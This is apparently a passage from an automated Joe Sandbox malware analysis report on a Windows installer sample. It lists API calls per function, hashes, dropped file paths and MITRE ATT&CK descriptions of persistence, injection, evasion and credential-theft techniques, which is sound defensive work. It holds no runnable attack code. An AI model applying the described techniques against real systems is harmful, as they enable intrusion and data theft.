Opcode ID: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
Opcode Fuzzy Hash: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9

Function 00402003 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 0040202E

Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,75A823A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B8

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
Opcode Fuzzy Hash: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
Opcode Fuzzy Hash: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

Function 0040558D Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,00436400), ref: 004055D0
GetLastError.KERNEL32 ref: 004055E4
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
GetLastError.KERNEL32 ref: 00405603

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402EDF,?), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC

Function 0040503B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040506A
CallWindowProcA.USER32(?,?,?,?), ref: 004050BB

Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D

Strings

, xrefs: 0040504B

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA

Function 00405B68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405B7C
GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96

Strings

nsa, xrefs: 00405B73

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

Function 375F4898 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$q, xrefs: 375F4AFF
$q, xrefs: 375F4B64
$q, xrefs: 375F4B58
$q, xrefs: 375F4AF3

Memory Dump Source

Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: f751d4eed217474a3cf410a830a410362cdb7fb066f607691c741a1771936d69
Instruction ID: 87ca1782d977dd45e1602a04ee824ad9b69b0485b3e7a9db8049eebb38091ad2
Opcode Fuzzy Hash: f751d4eed217474a3cf410a830a410362cdb7fb066f607691c741a1771936d69
Instruction Fuzzy Hash: 9DB13E34A01209DBEB18DFA5C590B9EB7F2EF88311F25852AD4169B355DB76DC82CB80

Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
CloseHandle.KERNEL32(?), ref: 00405675

Strings

Error launching installer, xrefs: 00405652

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

Function 375F4CB0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$q, xrefs: 375F4D3B
$q, xrefs: 375F4D2F
LRq, xrefs: 375F4DF2
LRq, xrefs: 375F4DA3

Memory Dump Source

Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd

Similarity

API ID:
String ID: LRq$LRq$$q$$q
API String ID: 0-2204215535
Opcode ID: d3d90114dce50a874767f98ec3368c43eac4a6f59ad2cf909dff9a3f95aa099e
Instruction ID: d42317817e57947a6667ff27f2e08a8fd0b31d7fdbdbdad40760417e803bc7ac
Opcode Fuzzy Hash: d3d90114dce50a874767f98ec3368c43eac4a6f59ad2cf909dff9a3f95aa099e
Instruction Fuzzy Hash: D351A034700305EFEB18DB68C891B6AB7E2BF89311F24856AE5019B361DB32EC41CB90

Function 375F7198 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

$q, xrefs: 375F731D
$q, xrefs: 375F734C
$q, xrefs: 375F72C9
$q, xrefs: 375F7375

Memory Dump Source

Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 5a8b9887ca01de90d5789c3af39054087c315e780312bba7d5f1cf5e70f77f8a
Instruction ID: 64ee46771caff9761f856d573d1c6365cdc7b496417c8e0a191646aa296a3dba
Opcode Fuzzy Hash: 5a8b9887ca01de90d5789c3af39054087c315e780312bba7d5f1cf5e70f77f8a
Instruction Fuzzy Hash: 3C516534A00209EFDB19DB64C890A9E77B2FF85350FA4492EE805D7355DB32EC42CB91

Function 00405A9E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 99200032052824.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rasterside.ini

C:\Users\user\AppData\Local\Temp\App.ini

C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Krapyls172.syg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Mattias.nap

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Nydannelses.Aar

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Sestertius.djv

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Slidsomt.bra

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\afslres.ten

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\discomposed.non

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\dred.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\gametophoric.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\isocola.sol

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\malningerne.bog

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\monodomous.kal

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\ornery.cem

Windows Analysis Report
99200032052824.bat.exe

Function 0040320C Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405768 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405FC2 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00402F9C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 0040558D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

